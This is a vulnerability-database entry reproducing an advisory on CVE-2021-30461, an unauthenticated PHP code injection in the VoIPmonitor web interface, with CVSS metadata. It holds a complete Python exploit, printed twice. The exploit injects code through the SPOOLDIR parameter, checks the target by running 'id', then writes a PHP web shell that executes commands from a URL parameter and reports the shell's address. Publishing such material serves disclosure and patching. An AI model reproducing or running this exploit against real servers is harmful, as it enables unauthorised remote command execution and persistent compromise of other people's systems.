VoIPMonitor未授权远程代码执行漏洞（CVE-2021-30461）

2021-05-08T00:00:00

Description

# SSD Advisory – VoIPmonitor UnAuth RCE May 6, 2021 [SSD Disclosure / Technical Lead](https://ssd-disclosure.com/author/noamr/) [Uncategorized](https://ssd-disclosure.com/category/uncategorized/) **TL;DR** Find out how a vulnerability in VoIPmonitor allows an unauthenticated attacker to execute arbitrary code. **Vulnerability Summary** VoIPmonitor is “open source network packet sniffer with commercial frontend for SIP RTP and RTCP VoIP protocols running on linux”. Use of user supplied data, arriving via web interface allows remote unauthenticated users to trigger a remote PHP code execution vulnerability in VoIPmonitor. **CVE** CVE-2021-30461 ***\*Credit\**** An independent security researcher, Furkan Göksel, has reported this vulnerability to the SSD Secure Disclosure program. **Affected Versions** VoIPmonitor version 24.60 and prior **Vendor Response** “A new GUI release 24.61 is fixing this security issue.” **Vulnerability Analysis** Due to improper filtering of malicious function, attacker can able to run command via PHP application of VoIPMonitor’s web UI. When POST request has been made to index.php file with `SPOOLDIR` and `recheck` parameters, the vulnerability can be triggered. This is due to the fact that `SPOOLDIR` value gets introduced into the `config/configuration.php` file that is later called by the UI interface. The `SPOOLDIR` value is placed “as is” in the PHP source code allowing remote attackers to insert arbitrary commands along with the intended value for this parameter. **Exploit** ```python import argparse from sys import argv,exit import time import random import string try: import requests except ImportError: print("pip3 install requests ") print(""" ############################################### # VOIP Monitor RCE # ############################################### """) headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Connection": "close"} def get_target(args): hostname = args.host path = args.path if path: return f"http://{hostname}/{path}/index.php" else: return f"http://{hostname}/index.php" def set_tmp(args): global headers target = get_target(args) n_data = {"SPOOLDIR": "/tmp", "recheck": "annen"} set_totmp = requests.post(target, n_data, headers=headers) print(f"[*] set /tmp {set_totmp}") def checkVulnerability(args): global headers target = get_target(args) print(f"[+] Attacking {target}") testcmd = {"SPOOLDIR": "test\".system(id).\"", "recheck": "annen"} response_text = b"uid=" testcmd_req = requests.post(target, testcmd, verify=False, headers=headers) if response_text in testcmd_req.content: print("[*] host is vulnerable") else: print("[-] host is not vulnerable") exit() def uploadshell(args): global headers hostname = args.host path = args.path shell_path = "" shellfilename = str ( ''.join(random.choice(string.ascii_lowercase) for i in range(10)) ) target = get_target(args) rce_payload = {"SPOOLDIR": f"/tmp\".file_put_contents('{shellfilename}.php','<?php echo system($_GET[\"a\"]);').\"", "recheck": "annen"} rce_req = requests.post(target, headers=headers, data=rce_payload) print(f"[*] uploading shell {rce_req.status_code}") if path: shell_path = f"http://{hostname}/{path}/{shellfilename}.php" else: shell_path = f"http://{hostname}/{shellfilename}.php" shell_check = requests.get(shell_path, headers=headers, params={'a':'id'}) print(f"[*] RCE Check : {shell_check.text}") print(f"[*] Your Shell at {shell_path}") def main(): parser = argparse.ArgumentParser(description='VoIP Monitor all versions command execution') parser.add_argument('-t','--host',help='Host', type=str) parser.add_argument('-b', '--path',help='Path of the VoIP Monitor', type=str) args = parser.parse_args() set_tmp(args) checkVulnerability(args) set_tmp(args) uploadshell(args) set_tmp(args) if __name__ == "__main__": main() ```

{"id": "SSV:99239", "type": "seebug", "bulletinFamily": "exploit", "title": "VoIPMonitor\u672a\u6388\u6743\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08CVE-2021-30461\uff09", "description": "# SSD Advisory \u2013 VoIPmonitor UnAuth RCE\n\nMay 6, 2021 [SSD Disclosure / Technical Lead](https://ssd-disclosure.com/author/noamr/) [Uncategorized](https://ssd-disclosure.com/category/uncategorized/)\n\n**TL;DR**\n\nFind out how a vulnerability in VoIPmonitor allows an unauthenticated attacker to execute arbitrary code.\n\n**Vulnerability Summary**\n\nVoIPmonitor is \u201copen source network packet sniffer with commercial frontend for SIP RTP and RTCP VoIP protocols running on linux\u201d.\n\nUse of user supplied data, arriving via web interface allows remote unauthenticated users to trigger a remote PHP code execution vulnerability in VoIPmonitor.\n\n**CVE**\n\nCVE-2021-30461\n\n***\\*Credit\\****\n\nAn independent security researcher, Furkan G\u00f6ksel, has reported this vulnerability to the SSD Secure Disclosure program.\n\n**Affected Versions**\n\nVoIPmonitor version 24.60 and prior\n\n**Vendor Response**\n\n\u201cA new GUI release 24.61 is fixing this security issue.\u201d\n\n**Vulnerability Analysis**\n\nDue to improper filtering of malicious function, attacker can able to run command via PHP application of VoIPMonitor\u2019s web UI.\n\nWhen POST request has been made to index.php file with `SPOOLDIR` and `recheck` parameters, the vulnerability can be triggered.\n\nThis is due to the fact that `SPOOLDIR` value gets introduced into the `config/configuration.php` file that is later called by the UI interface.\n\nThe `SPOOLDIR` value is placed \u201cas is\u201d in the PHP source code allowing remote attackers to insert arbitrary commands along with the intended value for this parameter.\n\n**Exploit**\n\n```python\nimport argparse\nfrom sys import argv,exit\nimport time\nimport random\nimport string\n\ntry:\n import requests\nexcept ImportError:\n print(\"pip3 install requests \")\n\nprint(\"\"\"\n###############################################\n# VOIP Monitor RCE #\n###############################################\n\"\"\")\n\nheaders = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\", \"Connection\": \"close\"}\n\n\ndef get_target(args):\n hostname = args.host\n path = args.path\n if path:\n return f\"http://{hostname}/{path}/index.php\"\n else:\n return f\"http://{hostname}/index.php\"\n\ndef set_tmp(args):\n global headers\n target = get_target(args)\n n_data = {\"SPOOLDIR\": \"/tmp\", \"recheck\": \"annen\"}\n set_totmp = requests.post(target, n_data, headers=headers)\n print(f\"[*] set /tmp {set_totmp}\")\n\n\ndef checkVulnerability(args):\n global headers\n target = get_target(args)\n print(f\"[+] Attacking {target}\")\n testcmd = {\"SPOOLDIR\": \"test\\\".system(id).\\\"\", \"recheck\": \"annen\"}\n response_text = b\"uid=\"\n testcmd_req = requests.post(target, testcmd, verify=False, headers=headers)\n if response_text in testcmd_req.content:\n print(\"[*] host is vulnerable\")\n else:\n print(\"[-] host is not vulnerable\")\n exit()\n\n\ndef uploadshell(args):\n global headers\n hostname = args.host\n path = args.path\n shell_path = \"\"\n shellfilename = str ( ''.join(random.choice(string.ascii_lowercase) for i in range(10)) )\n target = get_target(args)\n rce_payload = {\"SPOOLDIR\": f\"/tmp\\\".file_put_contents('{shellfilename}.php','<?php echo system($_GET[\\\"a\\\"]);').\\\"\", \"recheck\": \"annen\"}\n rce_req = requests.post(target, headers=headers, data=rce_payload)\n print(f\"[*] uploading shell {rce_req.status_code}\")\n if path:\n shell_path = f\"http://{hostname}/{path}/{shellfilename}.php\"\n else:\n shell_path = f\"http://{hostname}/{shellfilename}.php\"\n shell_check = requests.get(shell_path, headers=headers, params={'a':'id'})\n print(f\"[*] RCE Check : {shell_check.text}\")\n print(f\"[*] Your Shell at {shell_path}\")\n\n\ndef main():\n parser = argparse.ArgumentParser(description='VoIP Monitor all versions command execution')\n parser.add_argument('-t','--host',help='Host', type=str)\n parser.add_argument('-b', '--path',help='Path of the VoIP Monitor', type=str)\n args = parser.parse_args()\n set_tmp(args)\n checkVulnerability(args)\n set_tmp(args)\n uploadshell(args)\n set_tmp(args)\n\n\n\nif __name__ == \"__main__\":\n main()\n```", "published": "2021-05-08T00:00:00", "modified": "2021-05-08T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.seebug.org/vuldb/ssvid-99239", "reporter": "Knownsec", "references": [], "cvelist": ["CVE-2021-30461"], "immutableFields": [], "lastseen": "2021-07-24T10:56:08", "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0425"]}, {"type": "cve", "idList": ["CVE-2021-30461"]}, {"type": "githubexploit", "idList": ["2FC71FEA-D01A-505F-A34B-80EC65B2DE24", "4C29C6C8-3E9A-5617-80AD-E367D7C538B9", "8B5F5CC4-9345-5EC3-B507-5575BCD2D4F7"]}], "rev": 4}, "score": {"value": 6.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0425"]}, {"type": "cve", "idList": ["CVE-2021-30461"]}, {"type": "githubexploit", "idList": ["2FC71FEA-D01A-505F-A34B-80EC65B2DE24", "4C29C6C8-3E9A-5617-80AD-E367D7C538B9", "8B5F5CC4-9345-5EC3-B507-5575BCD2D4F7"]}]}, "exploitation": null, "vulnersScore": 6.5}, "sourceHref": "", "sourceData": "", "status": "cve,poc,details", "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1646136373}}

{"checkpoint_advisories": [{"lastseen": "2022-02-16T19:32:08", "description": "A remote code execution vulnerability exists in VoIPmonitor. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-02T00:00:00", "type": "checkpoint_advisories", "title": "VoIPmonitor Remote Code Execution (CVE-2021-30461)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30461"], "modified": "2021-08-02T00:00:00", "id": "CPAI-2021-0425", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2021-12-10T15:20:40", "description": "# CVE-2021-30461\nVOIP RCE\n\nTechn...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-07T09:22:01", "type": "githubexploit", "title": "Exploit for Code Injection in Voipmonitor", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30461"], "modified": "2021-10-10T08:47:13", "id": "4C29C6C8-3E9A-5617-80AD-E367D7C538B9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-30T03:44:28", "description": "### Impacted Products\r\n\r\nVoIPmonitor < 24.60\r\n\r\n### How to RCE\r...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-14T19:20:11", "type": "githubexploit", "title": "Exploit for Code Injection in Voipmonitor", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30461"], "modified": "2022-01-30T02:59:48", "id": "2FC71FEA-D01A-505F-A34B-80EC65B2DE24", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-19T06:50:48", "description": "### Impacted Products\r\n\r\nVoIPmonitor < 24.60\r\n\r\n### How to RCE\r...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-11T04:09:04", "type": "githubexploit", "title": "Exploit for Code Injection in Voipmonitor", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30461"], "modified": "2022-05-19T06:07:23", "id": "8B5F5CC4-9345-5EC3-B507-5575BCD2D4F7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "cve": [{"lastseen": "2022-03-23T17:32:52", "description": "A remote code execution issue was discovered in the web UI of VoIPmonitor before 24.61. When the recheck option is used, the user-supplied SPOOLDIR value (which might contain PHP code) is injected into config/configuration.php.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-29T14:15:00", "type": "cve", "title": "CVE-2021-30461", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30461"], "modified": "2021-06-09T17:43:00", "cpe": [], "id": "CVE-2021-30461", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-30461", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}]}

VoIPMonitor未授权远程代码执行漏洞（CVE-2021-30461）

Description

Related